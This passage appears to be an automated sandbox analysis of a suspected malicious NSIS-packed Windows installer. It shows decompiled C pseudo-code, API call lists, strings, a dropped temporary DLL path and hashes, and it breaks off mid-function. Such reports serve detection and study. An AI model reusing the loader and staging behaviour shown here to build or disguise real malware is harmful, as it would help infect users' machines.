              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: Find$CloseFileFirst
              • String ID:
              • API String ID: 2295610775-0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 96%
              			E00403C0B(void* __eflags) {
              				intOrPtr _v4;
              				intOrPtr _v8;
              				int _v12;
              				void _v16;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr* _t22;
              				void* _t30;
              				void* _t32;
              				int _t33;
              				void* _t36;
              				int _t39;
              				int _t40;
              				int _t44;
              				short _t63;
              				WCHAR* _t65;
              				signed char _t69;
              				signed short _t73;
              				WCHAR* _t76;
              				intOrPtr _t82;
              				WCHAR* _t87;
              
              				_t82 =  *0x42a274;
              				_t22 = E00406931(2);
              				_t90 = _t22;
              				if(_t22 == 0) {
              					_t76 = 0x423748;
              					L"1033" = 0x30;
              					 *0x437002 = 0x78;
              					 *0x437004 = 0;
              					E0040640A(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
              					__eflags =  *0x423748;
              					if(__eflags == 0) {
              						E0040640A(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
              					}
              					lstrcatW(L"1033", _t76);
              				} else {
              					_t73 =  *_t22(); // executed
              					E00406483(L"1033", _t73 & 0x0000ffff);
              				}
              				E00403EE1(_t78, _t90);
              				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Temp";
              				 *0x42a300 =  *0x42a27c & 0x00000020;
              				 *0x42a31c = 0x10000;
              				if(E00405F19(_t90, L"C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
              					L16:
              					if(E00405F19(_t98, _t86) == 0) {
              						E00406579(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
              					}
              					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
              					 *0x429248 = _t30;
              					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
              						L21:
              						if(E0040140B(0) == 0) {
              							_t32 = E00403EE1(_t78, __eflags);
              							__eflags =  *0x42a320;
              							if( *0x42a320 != 0) {
              								_t33 = E00405677(_t32, 0);
              								__eflags = _t33;
              								if(_t33 == 0) {
              									E0040140B(1);
              									goto L33;
              								}
              								__eflags =  *0x42922c;
              								if( *0x42922c == 0) {
              									E0040140B(2);
              								}
              								goto L22;
              							}
              							ShowWindow( *0x423728, 5);
              							_t39 = E004068C1("RichEd20");
              							__eflags = _t39;
              							if(_t39 == 0) {
              								E004068C1("RichEd32");
              							}
              							_t87 = L"RichEdit20W";
              							_t40 = GetClassInfoW(0, _t87, 0x429200);
              							__eflags = _t40;
              							if(_t40 == 0) {
              								GetClassInfoW(0, L"RichEdit", 0x429200);
              								 *0x429224 = _t87;
              								RegisterClassW(0x429200);
              							}
              							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E00403FB9, 0);
              							E00403B5B(E0040140B(5), 1);
              							return _t44;
              						}
              						L22:
              						_t36 = 2;
              						return _t36;
              					} else {
              						_t78 =  *0x42a260;
              						 *0x429204 = E00401000;
              						 *0x429210 =  *0x42a260;
              						 *0x429214 = _t30;
              						 *0x429224 = 0x40a3b4;
              						if(RegisterClassW(0x429200) == 0) {
              							L33:
              							__eflags = 0;
              							return 0;
              						}
              						SystemParametersInfoW(0x30, 0,  &_v16, 0);
              						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
              						goto L21;
              					}
              				} else {
              					_t78 =  *(_t82 + 0x48);
              					_t92 = _t78;
              					if(_t78 == 0) {
              						goto L16;
              					}
              					_t76 = 0x428200;
              					E0040640A(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a2b8 + _t78 * 2,  *0x42a2b8 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
              					_t63 =  *0x428200; // 0x4b
              					if(_t63 == 0) {
              						goto L16;
              					}
              					if(_t63 == 0x22) {
              						_t76 = 0x428202;
              						 *((short*)(E00405E3E(0x428202, 0x22))) = 0;
              					}
              					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
              					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
              						L15:
              						E0040653C(_t86, E00405E11(_t76));
              						goto L16;
              					} else {
              						_t69 = GetFileAttributesW(_t76);
              						if(_t69 == 0xffffffff) {
              							L14:
              							E00405E5D(_t76);
              							goto L15;
              						}
              						_t98 = _t69 & 0x00000010;
              						if((_t69 & 0x00000010) != 0) {
              							goto L15;
              						}
              						goto L14;
              					}
              				}
              			}

              APIs
                • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
              • GetUserDefaultUILanguage.KERNELBASE(00000002,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,00000000), ref: 00403C25
                • Part of subcall function 00406483: wsprintfW.USER32 ref: 00406490
              • lstrcatW.KERNEL32(1033,00423748), ref: 00403C8C
              • lstrlenW.KERNEL32(KXCJDFJSKF,?,?,?,KXCJDFJSKF,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,73BCFAA0), ref: 00403D0C
              • lstrcmpiW.KERNEL32(?,.exe,KXCJDFJSKF,?,?,?,KXCJDFJSKF,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403D1F
              • GetFileAttributesW.KERNEL32(KXCJDFJSKF), ref: 00403D2A
              • LoadImageW.USER32 ref: 00403D73
              • RegisterClassW.USER32 ref: 00403DB0
              • SystemParametersInfoW.USER32 ref: 00403DC8
              • CreateWindowExW.USER32 ref: 00403DFD
              • ShowWindow.USER32(00000005,00000000), ref: 00403E33
              • GetClassInfoW.USER32 ref: 00403E5F
              • GetClassInfoW.USER32 ref: 00403E6C
              • RegisterClassW.USER32 ref: 00403E75
              • DialogBoxParamW.USER32 ref: 00403E94
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
              • String ID: "C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$KXCJDFJSKF$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
              • API String ID: 606308-3626820478
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 99%
              			E00403068(void* __eflags, signed int _a4) {
              				DWORD* _v8;
              				DWORD* _v12;
              				intOrPtr _v16;
              				long _v20;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				intOrPtr _v32;
              				intOrPtr _v36;
              				signed int _v40;
              				short _v560;
              				signed int _t54;
              				void* _t62;
              				intOrPtr _t65;
              				void* _t68;
              				intOrPtr* _t70;
              				intOrPtr _t71;
              				signed int _t77;
              				signed int _t82;
              				signed int _t83;
              				signed int _t89;
              				intOrPtr _t92;
              				long _t94;
              				signed int _t102;
              				signed int _t104;
              				void* _t106;
              				signed int _t107;
              				signed int _t110;
              				intOrPtr* _t111;
              
              				_t94 = 0;
              				_v8 = 0;
              				_v12 = 0;
              				 *0x42a270 = GetTickCount() + 0x3e8;
              				GetModuleFileNameW(0, L"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs\\hmhrpib.exe", 0x400);
              				_t106 = E00406032(L"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs\\hmhrpib.exe", 0x80000000, 3);
              				 *0x40a018 = _t106;
              				if(_t106 == 0xffffffff) {
              					return L"Error launching installer";
              				}
              				E0040653C(L"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs", L"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs\\hmhrpib.exe");
              				E0040653C(0x439000, E00405E5D(L"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs"));
              				_t54 = GetFileSize(_t106, 0);
              				__eflags = _t54;
              				 *0x420f00 = _t54;
              				_t110 = _t54;
              				if(_t54 <= 0) {
              					L24:
              					E00402FC6(1);
              					__eflags =  *0x42a278 - _t94;
              					if( *0x42a278 == _t94) {
              						goto L32;
              					}
              					__eflags = _v12 - _t94;
              					if(_v12 == _t94) {
              						L28:
              						_t111 = GlobalAlloc(0x40, _v20);
              						E00406A8C(0x40ce68);
              						E00406061(0x40ce68,  &_v560, L"C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
              						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
              						__eflags = _t62 - 0xffffffff;
              						 *0x40a01c = _t62;
              						if(_t62 != 0xffffffff) {
              							_t65 = E00403590( *0x42a278 + 0x1c);
              							 *0x420f04 = _t65;
              							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
              							_t68 = E00403309(_v16, 0xffffffff, _t94, _t111, _v20); // executed
              							__eflags = _t68 - _v20;
              							if(_t68 == _v20) {
              								__eflags = _v40 & 0x00000001;
              								 *0x42a274 = _t111;
              								 *0x42a27c =  *_t111;
              								if((_v40 & 0x00000001) != 0) {
              									 *0x42a280 =  *0x42a280 + 1;
              									__eflags =  *0x42a280;
              								}
              								_t45 = _t111 + 0x44; // 0x44
              								_t70 = _t45;
              								_t102 = 8;
              								do {
              									_t70 = _t70 - 8;
              									 *_t70 =  *_t70 + _t111;
              									_t102 = _t102 - 1;
              									__eflags = _t102;
              								} while (_t102 != 0);
              								_t71 =  *0x420ef4; // 0x3770f
              								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
              								E00405FED(0x42a2a0, _t111 + 4, 0x40);
              								__eflags = 0;
              								return 0;
              							}
              							goto L32;
              						}
              						return L"Error writing temporary file. Make sure your temp folder is valid.";
              					}
              					E00403590( *0x420ef0);
              					_t77 = E0040357A( &_a4, 4);
              					__eflags = _t77;
              					if(_t77 == 0) {
              						goto L32;
              					}
              					__eflags = _v8 - _a4;
              					if(_v8 != _a4) {
              						goto L32;
              					}
              					goto L28;
              				} else {
              					do {
              						_t107 = _t110;
              						asm("sbb eax, eax");
              						_t82 = ( ~( *0x42a278) & 0x00007e00) + 0x200;
              						__eflags = _t110 - _t82;
              						if(_t110 >= _t82) {
              							_t107 = _t82;
              						}
              						_t83 = E0040357A(0x418ef0, _t107);
              						__eflags = _t83;
              						if(_t83 == 0) {
              							E00402FC6(1);
              							L32:
              							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
              						}
              						__eflags =  *0x42a278;
              						if( *0x42a278 != 0) {
              							__eflags = _a4 & 0x00000002;
              							if((_a4 & 0x00000002) == 0) {
              								E00402FC6(0);
              							}
              							goto L20;
              						}
              						E00405FED( &_v40, 0x418ef0, 0x1c);
              						_t89 = _v40;
              						__eflags = _t89 & 0xfffffff0;
              						if((_t89 & 0xfffffff0) != 0) {
              							goto L20;
              						}
              						__eflags = _v36 - 0xdeadbeef;
              						if(_v36 != 0xdeadbeef) {
              							goto L20;
              						}
              						__eflags = _v24 - 0x74736e49;
              						if(_v24 != 0x74736e49) {
              							goto L20;
              						}
              						__eflags = _v28 - 0x74666f73;
              						if(_v28 != 0x74666f73) {
              							goto L20;
              						}
              						__eflags = _v32 - 0x6c6c754e;
              						if(_v32 != 0x6c6c754e) {
              							goto L20;
              						}
              						_a4 = _a4 | _t89;
              						_t104 =  *0x420ef0; // 0x2f5b0
              						 *0x42a320 =  *0x42a320 | _a4 & 0x00000002;
              						_t92 = _v16;
              						__eflags = _t92 - _t110;
              						 *0x42a278 = _t104;
              						if(_t92 > _t110) {
              							goto L32;
              						}
              						__eflags = _a4 & 0x00000008;
              						if((_a4 & 0x00000008) != 0) {
              							L16:
              							_v12 = _v12 + 1;
              							_t110 = _t92 - 4;
              							__eflags = _t107 - _t110;
              							if(_t107 > _t110) {
              								_t107 = _t110;
              							}
              							goto L20;
              						}
              						__eflags = _a4 & 0x00000004;
              						if((_a4 & 0x00000004) != 0) {
              							break;
              						}
              						goto L16;
              						L20:
              						__eflags = _t110 -  *0x420f00; // 0x31437
              						if(__eflags < 0) {
              							_v8 = E00406A1E(_v8, 0x418ef0, _t107);
              						}
              						 *0x420ef0 =  *0x420ef0 + _t107;
              						_t110 = _t110 - _t107;
              						__eflags = _t110;
              					} while (_t110 != 0);
              					_t94 = 0;
              					__eflags = 0;
              					goto L24;
              				}
              			}

              APIs
              • GetTickCount.KERNEL32 ref: 0040307C
              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,00000400), ref: 00403098
                • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,80000000,00000003), ref: 00406036
                • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\AppData\Roaming\tteegmiuoefs,C:\Users\user\AppData\Roaming\tteegmiuoefs,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,80000000,00000003), ref: 004030E1
              • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 00403223
              Strings
              • "C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" , xrefs: 00403068
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403072, 0040323B
              • Null, xrefs: 0040315F
              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004032BA
              • soft, xrefs: 00403156
              • C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe, xrefs: 00403082, 00403091, 004030A5, 004030C2
              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040326C
              • Error launching installer, xrefs: 004030B8
              • Inst, xrefs: 0040314D
              • C:\Users\user\AppData\Roaming\tteegmiuoefs, xrefs: 004030C3, 004030C8, 004030CE
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
              • String ID: "C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\tteegmiuoefs$C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
              • API String ID: 2803837635-3957281496
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E0040176F(FILETIME* __ebx, void* __eflags) {
              				void* __esi;
              				void* _t35;
              				void* _t43;
              				void* _t45;
              				FILETIME* _t51;
              				FILETIME* _t64;
              				void* _t66;
              				signed int _t72;
              				FILETIME* _t73;
              				FILETIME* _t77;
              				signed int _t79;
              				WCHAR* _t81;
              				void* _t83;
              				void* _t84;
              				void* _t86;
              
              				_t77 = __ebx;
              				 *(_t86 - 8) = E00402D3E(0x31);
              				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
              				_t35 = E00405E88( *(_t86 - 8));
              				_push( *(_t86 - 8));
              				_t81 = L"KXCJ";
              				if(_t35 == 0) {
              					lstrcatW(E00405E11(E0040653C(_t81, L"C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
              				} else {
              					E0040653C();
              				}
              				E004067EB(_t81);
              				while(1) {
              					__eflags =  *(_t86 + 8) - 3;
              					if( *(_t86 + 8) >= 3) {
              						_t66 = E0040689A(_t81);
              						_t79 = 0;
              						__eflags = _t66 - _t77;
              						if(_t66 != _t77) {
              							_t73 = _t66 + 0x14;
              							__eflags = _t73;
              							_t79 = CompareFileTime(_t73, _t86 - 0x24);
              						}
              						asm("sbb eax, eax");
              						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
              						__eflags = _t72;
              						 *(_t86 + 8) = _t72;
              					}
              					__eflags =  *(_t86 + 8) - _t77;
              					if( *(_t86 + 8) == _t77) {
              						E0040600D(_t81);
              					}
              					__eflags =  *(_t86 + 8) - 1;
              					_t43 = E00406032(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
              					__eflags = _t43 - 0xffffffff;
              					 *(_t86 - 0x38) = _t43;
              					if(_t43 != 0xffffffff) {
              						break;
              					}
              					__eflags =  *(_t86 + 8) - _t77;
              					if( *(_t86 + 8) != _t77) {
              						E004055A4(0xffffffe2,  *(_t86 - 8));
              						__eflags =  *(_t86 + 8) - 2;
              						if(__eflags == 0) {
              							 *((intOrPtr*)(_t86 - 4)) = 1;
              						}
              						L31:
              						 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t86 - 4));
              						__eflags =  *0x42a308;
              						goto L32;
              					} else {
              						E0040653C(0x40b5f8, _t83);
              						E0040653C(_t83, _t81);
              						E00406579(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp\nsb1C63.tmp\qm1tw12xr.dll",  *((intOrPtr*)(_t86 - 0x1c)));
              						E0040653C(_t83, 0x40b5f8);
              						_t64 = E00405BA2("C:\Users\jones\AppData\Local\Temp\nsb1C63.tmp\qm1tw12xr.dll",  *(_t86 - 0x30) >> 3) - 4;
              						__eflags = _t64;
              						if(_t64 == 0) {
              							continue;
              						} else {
              							__eflags = _t64 == 1;
              							if(_t64 == 1) {
              								 *0x42a308 =  &( *0x42a308->dwLowDateTime);
              								L32:
              								_t51 = 0;
              								__eflags = 0;
              							} else {
              								_push(_t81);
              								_push(0xfffffffa);
              								E004055A4();
              								L29:
              								_t51 = 0x7fffffff;
              							}
              						}
              					}
              					L33:
              					return _t51;
              				}
              				E004055A4(0xffffffea,  *(_t86 - 8));
              				 *0x42a334 =  *0x42a334 + 1;
              				_t45 = E00403309(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
              				 *0x42a334 =  *0x42a334 - 1;
              				__eflags =  *(_t86 - 0x24) - 0xffffffff;
              				_t84 = _t45;
              				if( *(_t86 - 0x24) != 0xffffffff) {
              					L22:
              					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
              				} else {
              					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
              					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
              						goto L22;
              					}
              				}
              				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
              				__eflags = _t84 - _t77;
              				if(_t84 >= _t77) {
              					goto L31;
              				} else {
              					__eflags = _t84 - 0xfffffffe;
              					if(_t84 != 0xfffffffe) {
              						E00406579(_t77, _t81, _t84, _t81, 0xffffffee);
              					} else {
              						E00406579(_t77, _t81, _t84, _t81, 0xffffffe9);
              						lstrcatW(_t81,  *(_t86 - 8));
              					}
              					_push(0x200010);
              					_push(_t81);
              					E00405BA2();
              					goto L29;
              				}
              				goto L33;
              			}



















              APIs
              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
              • CompareFileTime.KERNEL32(-00000014,?,KXCJDFJSKF,KXCJDFJSKF,00000000,00000000,KXCJDFJSKF,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                • Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                • Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
              • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsb1C63.tmp\qm1tw12xr.dll$KXCJDFJSKF
              • API String ID: 1941528284-804983563
              • Opcode ID: 4b913798fb200dfea553bd9fe538fd44ff4447b51554b0a60bb8fefd456ad0c1
              • Instruction ID: 1f20f3305f5cdc04e1f2059eaac63a386f89c848407f65c8aae314978641b4a4
              • Opcode Fuzzy Hash: 4b913798fb200dfea553bd9fe538fd44ff4447b51554b0a60bb8fefd456ad0c1
              • Instruction Fuzzy Hash: 08419431500114BACF10BFB9DD85DAE7A79EF45729B20423FF422B10E2D73C8A519A6E
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 02F1126A: Sleep.KERNELBASE(?,?,034CF0BF), ref: 02F1128F
              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02F118E7
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02F11960
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.706730415.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false
              Similarity
              • API ID: AllocCreateFileSleepVirtual
              • String ID: 912b4404d7d84462b22a6b7539dd3e97
              • API String ID: 3031228858-2352350902
              • Opcode ID: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction ID: 0e0c1f0854972cb0b8b111aa65489d29d9002ae4c88cc3b85f6e7afb3584bd52
              • Opcode Fuzzy Hash: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction Fuzzy Hash: 47024B25E54398E9EB61CBE4EC16BEDB7B5AF04B10F50448AE60CFA1D1D3B10A84DF16
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02F10A52
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 02F10C1F
              Memory Dump Source
              • Source File: 00000008.00000002.706730415.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false
              Similarity
              • API ID: CreateFileFreeVirtual
              • String ID:
              • API String ID: 204039940-0
              • Opcode ID: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction ID: 04d0a6c51d010c2d90088deb031727e81730b81c60a4c3156ce8ff28ee7549dd
              • Opcode Fuzzy Hash: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction Fuzzy Hash: B5A1F035E00249EFDF14CFE4C985BADBBB1EF08355F60849AEA10BA2A0D7755A81DF14
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405A73(WCHAR* _a4) {
              				struct _SECURITY_ATTRIBUTES _v16;
              				struct _SECURITY_DESCRIPTOR _v36;
              				int _t22;
              				long _t23;
              
              				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
              				_v36.Owner = 0x4083f8;
              				_v36.Group = 0x4083f8;
              				_v36.Sacl = _v36.Sacl & 0x00000000;
              				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
              				_v16.lpSecurityDescriptor =  &_v36;
              				_v36.Revision = 1;
              				_v36.Control = 4;
              				_v36.Dacl = 0x4083e8;
              				_v16.nLength = 0xc;
              				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
              				if(_t22 != 0) {
              					L1:
              					return 0;
              				}
              				_t23 = GetLastError();
              				if(_t23 == 0xb7) {
              					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
              						goto L1;
              					}
              					return GetLastError();
              				}
              				return _t23;
              			}








              APIs
              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
              • GetLastError.KERNEL32 ref: 00405ACA
              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADF
              • GetLastError.KERNEL32 ref: 00405AE9
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A99
              • C:\Users\user\AppData\Roaming\tteegmiuoefs, xrefs: 00405A73
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ErrorLast$CreateDirectoryFileSecurity
              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\tteegmiuoefs
              • API String ID: 3449924974-3996335378
              • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
              • Instruction ID: 182fb86997ef6356dfbf0076fac1484c8d0c28c6014f2d3d8060d55cd567293f
              • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
              • Instruction Fuzzy Hash: 30010871D00619EADF019BA0C988BEFBFB8EF04315F00813AD545B6280D7789648CFA9
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004068C1(intOrPtr _a4) {
              				short _v576;
              				signed int _t13;
              				struct HINSTANCE__* _t17;
              				signed int _t19;
              				void* _t24;
              
              				_t13 = GetSystemDirectoryW( &_v576, 0x104);
              				if(_t13 > 0x104) {
              					_t13 = 0;
              				}
              				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
              					_t19 = 1;
              				} else {
              					_t19 = 0;
              				}
              				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
              				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
              				return _t17;
              			}









              APIs
              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
              • wsprintfW.USER32 ref: 00406913
              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406927
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: DirectoryLibraryLoadSystemwsprintf
              • String ID: %s%S.dll$UXTHEME$\
              • API String ID: 2200240437-1946221925
              • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
              • Instruction ID: 979e31ef7f6a653eb027d6e7281dab5f214eebcb072a06bc6d9d9cfc9f176359
              • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
              • Instruction Fuzzy Hash: BDF02B71501219A7CB14BB68DD0DF9B376CEB00304F10447EA646F10D0EB7CDA68CB98
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00406061(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
              				intOrPtr _v8;
              				short _v12;
              				short _t12;
              				intOrPtr _t13;
              				signed int _t14;
              				WCHAR* _t17;
              				signed int _t19;
              				signed short _t23;
              				WCHAR* _t26;
              
              				_t26 = _a4;
              				_t23 = 0x64;
              				while(1) {
              					_t12 =  *L"nsa"; // 0x73006e
              					_t23 = _t23 - 1;
              					_v12 = _t12;
              					_t13 =  *0x40a5ac; // 0x61
              					_v8 = _t13;
              					_t14 = GetTickCount();
              					_t19 = 0x1a;
              					_v8 = _v8 + _t14 % _t19;
              					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
